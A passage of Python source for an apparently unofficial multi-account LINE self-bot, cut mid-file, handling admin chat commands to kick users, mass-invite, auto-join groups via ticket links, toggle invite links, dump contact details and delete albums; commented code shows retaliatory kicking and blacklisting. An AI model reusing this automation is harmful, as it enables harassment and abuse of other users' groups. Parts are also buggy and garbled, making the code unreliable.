# kb.acceptGroupInvitationByTicket(op.param1,Ti)
# ko.acceptGroupInvitationByTicket(op.param1,Ti)
# ke.acceptGroupInvitationByTicket(op.param1,Ti)
# G = ko.getGroup(op.param1)
# G.preventJoinByTicket = True
# ko.updateGroup(G)
# Ticket = ko.reissueGroupTicket(op.param1)
# if op.param2 in wait["blacklist"]:
# pass
# if op.param2 in wait["whitelist"]:
# pass
# else:
# wait["blacklist"][op.param2] = True
# if Hmid in op.param3:
# if op.param2 in Bots:
# pass
# try:
# random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
# except:
# try:
# random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
# except:
# print ("client Because it is not in the group or Because it does not exist in the group \n["+op.param1+"]\nOf\n["+op.param2+"]\n I could not kick \n Add it to the black list.")
# if op.param2 in wait["blacklist"]:
# pass
# if op.param2 in wait["whitelist"]:
# pass
# else:
# wait["blacklist"][op.param2] = True
#
# X = random.choice(KAC).getGroup(op.param1)
# X.preventJoinByTicket = False
# random.choice(KAC).updateGroup(X)
# Ti = random.choice(KAC).reissueGroupTicket(op.param1)
# cl.acceptGroupInvitationByTicket(op.param1,Ti)
# ki.acceptGroupInvitationByTicket(op.param1,Ti)
# kk.acceptGroupInvitationByTicket(op.param1,Ti)
# kc.acceptGroupInvitationByTicket(op.param1,Ti)
# ks.acceptGroupInvitationByTicket(op.param1,Ti)
# ka.acceptGroupInvitationByTicket(op.param1,Ti)
#kb.acceptGroupInvitationByTicket(op.param1,Ti)
# ko.acceptGroupInvitationByTicket(op.param1,Ti)
# ke.acceptGroupInvitationByTicket(op.param1,Ti)
# G = ke.getGroup(op.param1)
# G.preventJoinByTicket = True
# ke.updateGroup(G)
# Ticket = ke.reissueGroupTicket(op.param1)
# if op.param2 in wait["blacklist"]:
# pass
# if op.param2 in wait["whitelist"]:
# pass
# else:
# wait["blacklist"][op.param2] = True
#
if op.type == 22:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
if op.type == 24:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
if op.type == 26:
msg = op.message
if msg.toType == 0:
msg.to = msg.from_
if msg.from_ in owner:
if "join:" in msg.text:
list_ = msg.text.split(":")
try:
cl.acceptGroupInvitationByTicket(list_[1],list_[2])
G = cl.getGroup(list_[1])
G.preventJoinByTicket = True
cl.updateGroup(G)
except:
cl.sendText(msg.to,"error")
if op.type == 26:
msg = op.message
if msg.toType == 1:
if wait["leaveRoom"] == True:
cl.leaveRoom(msg.to)
if msg.contentType == 16:
url = msg.contentMetadata("line://home/post?userMid="+mid+"&postId="+"new_post")
cl.like(url[25:58], url[66:], likeType=1001)
if op.type == 26:
msg = op.message
if msg.contentType == 13:
if wait["wblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
cl.sendText(msg.to,"Already in blacklist")
wait["wblack"] = False
else:
wait["commentBlack"][msg.contentMetadata["mid"]] = True
wait["wblack"] = False
cl.sendText(msg.to,"Decided not to comment.")
if wait["dblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
del wait["commentBlack"][msg.contentMetadata["mid"]]
cl.sendText(msg.to,"Removed from blacklist.")
wait["dblack"] = False
else:
wait["dblack"] = False
cl.sendText(msg.to,"There's no target in blacklist.")
if wait["wblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
cl.sendText(msg.to,"Already in blacklist")
wait["wblacklist"] = False
else:
wait["blacklist"][msg.contentMetadata["mid"]] = True
wait["wblacklist"] = False
cl.sendText(msg.to,"Added to blacklist.")
if wait["dblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
del wait["blacklist"][msg.contentMetadata["mid"]]
cl.sendText(msg.to,"Removed from blacklist.")
wait["dblacklist"] = False
else:
wait["dblacklist"] = False
cl.sendText(msg.to,"There's no target in blacklist.")
if wait["contact"] == True:
msg.contentType = 0
cl.sendText(msg.to,msg.contentMetadata["mid"])
if 'displayName' in msg.contentMetadata:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"[displayName]:\n" + msg.contentMetadata["displayName"] + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu))
else:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"[displayName]:\n" + contact.displayName + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu))
elif msg.contentType == 16:
if wait["timeline"] == True:
msg.contentType = 0
if wait["lang"] == "JP":
msg.text = "post URL\n" + msg.contentMetadata["postEndUrl"]
else:
msg.text = "URL→\n" + msg.contentMetadata["postEndUrl"]
cl.sendText(msg.to,msg.text)
elif msg.text is None:
return
elif msg.text in ["@Key","@key","@help","@Help"]:
if msg.from_ in admin:
if wait["lang"] == "JP":
cl.sendText(msg.to,helpMessage)
else:
cl.sendText(msg.to,helpt)
elif msg.text in ["@set group"]:
if msg.from_ in admin:
if wait["lang"] == "JP":
cl.sendText(msg.to,Setgroup)
else:
cl.sendText(msg.to,Sett)
elif ("@Gn " in msg.text):
if msg.from_ in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.name = msg.text.replace("Gn ","")
cl.updateGroup(X)
else:
cl.sendText(msg.to,"It can't be used besides the group.")
elif ("ZSI2 gn " in msg.text):
if msg.from_ in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.name = msg.text.replace("ZSI2 gn ","")
ki.updateGroup(X)
else:
ki.sendText(msg.to,"It can't be used besides the group.")
elif ("ZSI3 gn " in msg.text):
if msg.from_ in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.name = msg.text.replace("ZSI3 gn ","")
kk.updateGroup(X)
else:
kk.sendText(msg.to,"It can't be used besides the group.")
elif ("ZSI4 gn " in msg.text):
if msg.from_ in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.name = msg.text.replace("ZSI4 gn ","")
kc.updateGroup(X)
else:
kc.sendText(msg.to,"It can't be used besides the group.")
elif "@Kick " in msg.text:
if msg.from_ in admin:
midd = msg.text.replace("Kick ","")
cl.kickoutFromGroup(msg.to,[midd])
elif "@ZSI2 kick " in msg.text:
if msg.from_ in admin:
midd = msg.text.replace("_second kick ","")
ki.kickoutFromGroup(msg.to,[midd])
elif "@ZSI3 kick " in msg.text:
if msg.from_ in admin:
midd = msg.text.replace("_third kick ","")
kk.kickoutFromGroup(msg.to,[midd])
elif "@ZSI4 kick " in msg.text:
if msg.from_ in admin:
midd = msg.text.replace("_fourth kick ","")
kc.kickoutFromGroup(msg.to,[midd])
elif "@Invite " in msg.text:
if msg.from_ in admin:
midd = msg.text.replace("Invite ","")
cl.findAndAddContactsByMid(midd)
cl.inviteIntoGroup(msg.to,[midd])
elif "@Sinvite " in msg.text:
if msg.from_ in admin:
midd = msg.text.replace("sinvite ","")
ki.findAndAddContactsByMid(midd)
ki.inviteIntoGroup(msg.to,[midd])
elif "@Tinvite " in msg.text:
if msg.from_ in admin:
midd = msg.text.replace("tinvite ","")
kk.findAndAddContactsByMid(midd)
kk.inviteIntoGroup(msg.to,[midd])
elif "@Finvite " in msg.text:
if msg.from_ in admin:
midd = msg.text.replace("finvite ","")
kc.findAndAddContactsByMid(midd)
kc.inviteIntoGroup(msg.to,[midd])
elif msg.text in ["@bot?"]:
if msg.from_ in admin:
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
cl.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Amid}
ki.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Bmid}
kk.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Cmid}
kc.sendMessage(msg)
# msg.contentType = 13
# msg.contentMetadata = {'mid': Dmid}
# ks.sendMessage(msg)
# msg.contentType = 13
# msg.contentMetadata = {'mid': Emid}
# ka.sendMessage(msg)
# msg.contentType = 13
# msg.contentMetadata = {'mid': Fmid}
# kb.sendMessage(msg)
# msg.contentType = 13
# msg.contentMetadata = {'mid': Gmid}
# ko.sendMessage(msg)
# msg.contentType = 13
# msg.contentMetadata = {'mid': Hmid}
# ke.sendMessage(msg)
elif msg.text in ["@Creator","@creator"]:
if msg.from_ in admin:
msg.contentType = 13
cl.sendText(msg.to, "Owner by FXR")
msg.contentMetadata = {'mid': 'u349dbde6509797ddc33adce5b85cd856'}
cl.sendMessage(msg)
elif msg.text in ["@Me"]:
if msg.from_ in admin:
msg.contentType = 13
msg.contentMetadata = {'mid': msg.from_}
random.choice(KAC).sendMessage(msg)
# elif msg.text in ["Cv2"]:
# msg.contentType = 13
# msg.contentMetadata = {'mid': Bmid}
# kk.sendMessage(msg)
elif msg.text in ["愛�プレゼント","@Gift"]:
if msg.from_ in admin:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58',
'PRDTYPE': 'THEME',
'MSGTPL': '5'}
msg.text = None
cl.sendMessage(msg)
# elif msg.text in ["愛�プレゼント","Cv1 gift"]:
# msg.contentType = 9
# msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58',
# 'PRDTYPE': 'THEME',
# 'MSGTPL': '6'}
# msg.text = None
# ki.sendMessage(msg)
# elif msg.text in ["愛�プレゼント","Cv2 gift"]:
# msg.contentType = 9
# msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58',
# 'PRDTYPE': 'THEME',
# 'MSGTPL': '8'}
# msg.text = None
# kk.sendMessage(msg)
# elif msg.text in ["愛�プレゼント","Cv3 gift"]:
# msg.contentType = 9
# msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58',
# 'PRDTYPE': 'THEME',
# 'MSGTPL': '10'}
# msg.text = None
# kc.sendMessage(msg)
elif msg.text in ["愛�プレゼント","@All gift"]:
if msg.from_ in admin:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58',
'PRDTYPE': 'THEME',
'MSGTPL': '12'}
msg.text = None
ki.sendMessage(msg)
kk.sendMessage(msg)
kc.sendMessage(msg)
elif msg.text in ["@Cancel","@cancel"]:
if msg.from_ in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
if X.invitee is not None:
gInviMids = [contact.mid for contact in X.invitee]
cl.cancelGroupInvitation(msg.to, gInviMids)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Invite Kosong")
else:
cl.sendText(msg.to,"Sorry, nobody absent")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["@ZSI cancel","@Bot cancel"]:
if msg.from_ in admin:
if msg.toType == 2:
G = k3.getGroup(msg.to)
if G.invitee is not None:
gInviMids = [contact.mid for contact in G.invitee]
k3.cancelGroupInvitation(msg.to, gInviMids)
else:
if wait["lang"] == "JP":
k3.sendText(msg.to,"No one is inviting")
else:
k3.sendText(msg.to,"Sorry, nobody absent")
else:
if wait["lang"] == "JP":
k3.sendText(msg.to,"Can not be used outside the group")
else:
k3.sendText(msg.to,"Not for use less than group")
#elif "gurl" == msg.text:
#print cl.getGroup(msg.to)
##cl.sendMessage(msg)
elif msg.text in ["@Open url","@open url"]:
if msg.from_ in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.preventJoinByTicket = False
cl.updateGroup(X)
if wait["lang"] == "JP":
cl.sendText(msg.to,"Invite by link open")
else:
cl.sendText(msg.to,"Already open")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["@ZSI2 ourl","@ZSI2 link on"]:
if msg.from_ in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.preventJoinByTicket = False
ki.updateGroup(X)
if wait["lang"] == "JP":
ki.sendText(msg.to,"Done Chivas")
else:
ki.sendText(msg.to,"already open")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["@ZSI3 ourl","@ZSI3 link on"]:
if msg.from_ in admin:
if msg.toType == 2:
X = kk.getGroup(msg.to)
X.preventJoinByTicket = False
kk.updateGroup(X)
if wait["lang"] == "JP":
kk.sendText(msg.to,"Done Chivas")
else:
kk.sendText(msg.to,"already open")
else:
if wait["lang"] == "JP":
kk.sendText(msg.to,"Can not be used outside the group")
else:
kk.sendText(msg.to,"Not for use less than group")
elif msg.text in ["@ZSI4 ourl","@ZSI4 link on"]:
if msg.from_ in admin:
if msg.toType == 2:
X = kc.getGroup(msg.to)
X.preventJoinByTicket = False
kc.updateGroup(X)
if wait["lang"] == "JP":
kc.sendText(msg.to,"Done Chivas")
else:
kc.sendText(msg.to,"already open")
else:
if wait["lang"] == "JP":
kc.sendText(msg.to,"Can not be used outside the group")
else:
kc.sendText(msg.to,"Not for use less than group")
elif msg.text in ["@Close url","@close url"]:
if msg.from_ in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.preventJoinByTicket = True
cl.updateGroup(X)
if wait["lang"] == "JP":
cl.sendText(msg.to,"Invite by link Close")
else:
cl.sendText(msg.to,"Already close")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["@ZSI2 curl","@ZSI2 link off"]:
if msg.from_ in admin:
if msg.toType == 2:
X = ki.getGroup(msg.to)
X.preventJoinByTicket = True
ki.updateGroup(X)
if wait["lang"] == "JP":
ki.sendText(msg.to,"Done Chivas")
else:
ki.sendText(msg.to,"already close")
else:
if wait["lang"] == "JP":
ki.sendText(msg.to,"Can not be used outside the group")
else:
ki.sendText(msg.to,"Not for use less than group")
elif msg.text in ["@ZSI3 curl","@ZSI3 link off"]:
if msg.from_ in admin:
if msg.toType == 2:
X = kk.getGroup(msg.to)
X.preventJoinByTicket = True
kk.updateGroup(X)
if wait["lang"] == "JP":
kk.sendText(msg.to,"Done Chivas")
else:
kk.sendText(msg.to,"already close")
else:
if wait["lang"] == "JP":
kk.sendText(msg.to,"Can not be used outside the group")
else:
kk.sendText(msg.to,"Not for use less than group")
elif msg.text in ["@ZSI4 curl","@ZSI4 link off"]:
if msg.from_ in admin:
if msg.toType == 2:
X = kc.getGroup(msg.to)
X.preventJoinByTicket = True
kc.updateGroup(X)
if wait["lang"] == "JP":
kc.sendText(msg.to,"Done Chivas")
else:
kc.sendText(msg.to,"already close")
else:
if wait["lang"] == "JP":
kc.sendText(msg.to,"Can not be used outside the group")
else:
kc.sendText(msg.to,"Not for use less than group")
elif "@jointicket " in msg.text.lower():
if msg.from_ in admin:
rplace=msg.text.lower().replace("jointicket ")
if rplace == "on":
wait["atjointicket"]=True
if rplace == "off":
wait["atjointicket"]=False
cl.sendText(msg.to,"Auto Join Group by Ticket is %s" % str(wait["atjointicket"]))
elif '/ti/g/' in msg.text.lower():
if msg.from_ in admin:
link_re = re.compile('(?:line\:\/|line\.me\/R)\/ti\/g\/([a-zA-Z0-9_-]+)?')
links = link_re.findall(msg.text)
n_links=[]
for l in links:
if l not in n_links:
n_links.append(l)
for ticket_id in n_links:
if wait["atjointicket"] == True:
group=cl.findGroupByTicket(ticket_id)
cl.acceptGroupInvitationByTicket(group.mid,ticket_id)
cl.sendText(msg.to,"Sukses join ke grup %s" % str(group.name))
elif msg.text == "Ginfo":
if msg.from_ in admin:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
gCreator = ginfo.creator.displayName
except:
gCreator = "Error"
if wait["lang"] == "JP":
if ginfo.invitee is None:
sinvitee = "0"
else:
sinvitee = str(len(ginfo.invitee))
if ginfo.preventJoinByTicket == True:
u = "close"
else:
u = "open"
cl.sendText(msg.to,"[group name]\n" + str(ginfo.name) + "\n[gid]\n" + msg.to + "\n[group creator]\n" + gCreator + "\n[profile status]\nhttp://dl.profile.line.naver.jp/" + ginfo.pictureStatus + "\nmembers:" + str(len(ginfo.members)) + "members\npending:" + sinvitee + "people\nURL:" + u + "it is inside")
else:
cl.sendText(msg.to,"[group name]\n" + str(ginfo.name) + "\n[gid]\n" + msg.to + "\n[group creator]\n" + gCreator + "\n[profile status]\nhttp://dl.profile.line.naver.jp/" + ginfo.pictureStatus)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif "@Id Group" == msg.text:
if msg.from_ in admin:
kk.sendText(msg.to,msg.to)
elif "@My mid" == msg.text:
if msg.from_ in admin:
random.choice(KAC).sendText(msg.to, msg.from_)
elif "@Mid all" == msg.text:
if msg.from_ in admin:
cl.sendText(msg.to,mid)
ki.sendText(msg.to,Amid)
kk.sendText(msg.to,Bmid)
kc.sendText(msg.to,Cmid)
# ks.sendText(msg.to,Dmid)
# ka.sendText(msg.to,Emid)
# kb.sendText(msg.to,Fmid)
# ko.sendText(msg.to,Gmid)
# ke.sendText(msg.to,Hmid)
elif "@Mid 1" == msg.text:
if msg.from_ in admin:
cl.sendText(msg.to,mid)
elif "@Mid 2" == msg.text:
if msg.from_ in admin:
ki.sendText(msg.to,Amid)
elif "@Mid 3" == msg.text:
if msg.from_ in admin:
kk.sendText(msg.to,Bmid)
elif "@Mid 4" == msg.text:
if msg.from_ in admin:
kc.sendText(msg.to,Cmid)
elif msg.text in ["Wkwkwk","Wkwk","Wk","wkwkwk","wkwk","wk"]:
if msg.from_ in admin:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "100",
"STKPKGID": "1",
"STKVER": "100" }
kk.sendMessage(msg)
elif msg.text in ["Hehehe","Hehe","He","hehehe","hehe","he"]:
if msg.from_ in admin:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "10",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
elif msg.text in ["Galau"]:
if msg.from_ in admin:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "9",
"STKPKGID": "1",
"STKVER": "100" }
kk.sendMessage(msg)
elif msg.text in ["You"]:
if msg.from_ in admin:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "7",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
elif msg.text in ["Hadeuh"]:
if msg.from_ in admin:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "6",
"STKPKGID": "1",
"STKVER": "100" }
kk.sendMessage(msg)
elif msg.text in ["Please"]:
if msg.from_ in admin:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "4",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
elif msg.text in ["Haaa"]:
if msg.from_ in admin:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "3",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
elif msg.text in ["Lol"]:
if msg.from_ in admin:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "110",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
elif msg.text in ["Hmmm","Hmm","Hm","hmmm","hmm","hm"]:
if msg.from_ in admin:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "101",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
elif msg.text in ["Welcome"]:
if msg.from_ in admin:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "247",
"STKPKGID": "3",
"STKVER": "100" }
kk.sendMessage(msg)
cl.sendMessage(msg)
elif msg.text in ["@TL: "]:
if msg.from_ in admin:
tl_text = msg.text.replace("TL: ","")
cl.sendText(msg.to,"line://home/post?userMid="+mid+"&postId="+cl.new_post(tl_text)["result"]["post"]["postInfo"]["postId"])
elif msg.text in ["@Cn "]:
if msg.from_ in owner:
string = msg.text.replace("Cn ","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
cl.updateProfile(profile)
cl.sendText(msg.to,"name " + string + " done")
elif msg.text in ["@ZSI2 rename "]:
if msg.from_ in owner:
string = msg.text.replace("ZS2 rename ","")
if len(string.decode('utf-8')) <= 20:
profile_B = ki.getProfile()
profile_B.displayName = string
ki.updateProfile(profile_B)
ki.sendText(msg.to,"name " + string + " done")
elif msg.text in ["@ZS3 rename "]:
if msg.from_ in owner:
string = msg.text.replace("ZSI3 rename ","")
if len(string.decode('utf-8')) <= 20:
profile_B = kk.getProfile()
profile_B.displayName = string
kk.updateProfile(profile_B)
kk.sendText(msg.to,"name " + string + " done")
elif msg.text in ["@ZS4 rename "]:
if msg.from_ in owner:
string = msg.text.replace("ZSI4 rename ","")
if len(string.decode('utf-8')) <= 20:
profile_B = kc.getProfile()
profile_B.displayName = string
kc.updateProfile(profile_B)
kc.sendText(msg.to,"name " + string + " done")
elif msg.text in ["@Mc "]:
if msg.from_ in admin:
mmid = msg.text.replace("Mc ","")
msg.contentType = 13
msg.contentMetadata = {"mid":mmid}
cl.sendMessage(msg)
elif msg.text in ["@Joinn on","@joinn on"]:
if msg.from_ in admin:
if wait["Protectjoin"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"kick Joined Group On")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectjoin"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"kick Joined Group On")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["@Joinn off","@joinn off"]:
if msg.from_ in admin:
if wait["Protectjoin"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"kick Joined Group Off")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectjoin"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"kick Joined Group Off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["@Cancl on","@cancl on"]:
if msg.from_ in admin:
if wait["Protectcancl"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel All Invited On")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectcancl"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel All Invited On")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["@Cancl off","@cancl off"]:
if msg.from_ in admin:
if wait["Protectcancl"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel All Invited Off")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectcancl"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel All Invited Off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["@Gr on","@gr on"]:
if msg.from_ in admin:
if wait["Protectgr"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect Group On")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectgr"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect Group On")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["@Gr off","@gr off"]:
if msg.from_ in admin:
if wait["Protectgr"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect Group Off")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectgr"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect Group Off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["@Contact On","@Contact on","@contact on"]:
if msg.from_ in admin:
if wait["contact"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cek Mid Send Contact On")
else:
cl.sendText(msg.to,"done")
else:
wait["contact"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cek Mid Send Contact On")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["@Contact Off","@Contact off","@contact off"]:
if msg.from_ in admin:
if wait["contact"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cek Mid Send Contact Off")
else:
cl.sendText(msg.to,"done")
else:
wait["contact"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cek Mid Send Contact Off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["自動å�‚åŠ :オン","@join on","@auto join:on","自動å�ƒåŠ ï¼šé–‹"]:
if msg.from_ in admin:
if wait["autoJoin"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["autoJoin"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["自動å�‚åŠ :オフ","@join off","@auto join:off","自動å�ƒåŠ ï¼šé—œ"]:
if msg.from_ in admin:
if wait["autoJoin"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["autoJoin"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["@gcancel:"]:
if msg.from_ in admin:
try:
strnum = msg.text.replace("Gcancel:","")
if strnum == "off":
wait["autoCancel"]["on"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Invitation refused turned off\nTo turn on please specify the number of people and send")
else:
cl.sendText(msg.to,"关了邀请拒�。�时开请指定人数��")
else:
num = int(strnum)
wait["autoCancel"]["on"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,strnum + "The group of people and below decided to automatically refuse invitation")
else:
cl.sendText(msg.to,strnum + "使人以下的�组用自动邀请拒�")
except:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Value is wrong")
else:
cl.sendText(msg.to,"Bizarre ratings")
elif msg.text in ["強制自動退出:オン","@leave on","@auto leave:on","強制自動退出:開"]:
if msg.from_ in admin:
if wait["leaveRoom"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["leaveRoom"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"�了开。")
elif msg.text in ["強制自動退出:オフ","@leave off","@auto leave:off","強制自動退出:關"]:
if msg.from_ in admin:
if wait["leaveRoom"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["leaveRoom"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"already")
elif msg.text in ["共有:オン","@share on","@Share on"]:
if msg.from_ in admin:
if wait["timeline"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["timeline"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"�了开。")
elif msg.text in ["共有:オフ","@share off","@Share off"]:
if msg.from_ in admin:
if wait["timeline"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["timeline"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"è¦�了关æ–。")
elif msg.text in ["@set view"]:
if msg.from_ in admin:
md = ""
if wait["Protectjoin"] == True: md+="lock Block Join\n"
else: md+=" Block Join Off\n"
if wait["Protectgr"] == True: md+="lock Block Group\n"
else: md+=" Block Group Off\n"
if wait["Protectcancl"] == True: md+="lock Cancel All Invited\n"
else: md+=" Cancel All Invited Off\n"
if wait["contact"] == True: md+=" Contact : on\n"
else: md+=" Contact : off\n"
if wait["autoJoin"] == True: md+=" Auto join : on\n"
else: md +=" Auto join : off\n"
if wait["autoCancel"]["on"] == True:md+=" Group cancel :" + str(wait["autoCancel"]["members"]) + "\n"
else: md+= " Group cancel : off\n"
if wait["leaveRoom"] == True: md+=" Auto leave : on\n"
else: md+=" Auto leave : off\n"
if wait["timeline"] == True: md+=" Share : on\n"
else:md+=" Share : off\n"
if wait["autoAdd"] == True: md+=" Auto add : on\n"
else:md+=" Auto add : off\n"
if wait["commentOn"] == True: md+=" Comment : on\n"
else:md+=" Comment : off\n"
cl.sendText(msg.to,md)
elif "@album merit " in msg.text:
if msg.from_ in admin:
gid = msg.text.replace("album merit ","")
album = cl.getAlbum(gid)
if album["result"]["items"] == []:
if wait["lang"] == "JP":
cl.sendText(msg.to,"There is no album")
else:
cl.sendText(msg.to,"相册没在。")
else:
if wait["lang"] == "JP":
mg = "The following is the target album"
else:
mg = "以下是对象的相册"
for y in album["result"]["items"]:
if "photoCount" in y:
mg += str(y["title"]) + ":" + str(y["photoCount"]) + "sheet\n"
else:
mg += str(y["title"]) + ":0sheet\n"
cl.sendText(msg.to,mg)
elif "@album " in msg.text:
if msg.from_ in admin:
gid = msg.text.replace("album ","")
album = cl.getAlbum(gid)
if album["result"]["items"] == []:
if wait["lang"] == "JP":
cl.sendText(msg.to,"There is no album")
else:
cl.sendText(msg.to,"相册没在。")
else:
if wait["lang"] == "JP":
mg = "The following is the target album"
else:
mg = "以下是对象的相册"
for y in album["result"]["items"]:
if "photoCount" in y:
mg += str(y["title"]) + ":" + str(y["photoCount"]) + "sheet\n"
else:
mg += str(y["title"]) + ":0sheet\n"
elif "@album remove " in msg.text:
if msg.from_ in admin:
gid = msg.text.replace("album remove ","")
albums = cl.getAlbum(gid)["result"]["items"]
i = 0
if albums != []:
for album in albums:
cl.deleteAlbum(gid,album["id"])
i += 1
if wait["lang"] == "JP":
cl.sendText(msg.to,str(i) + "Deleted albums")
else:
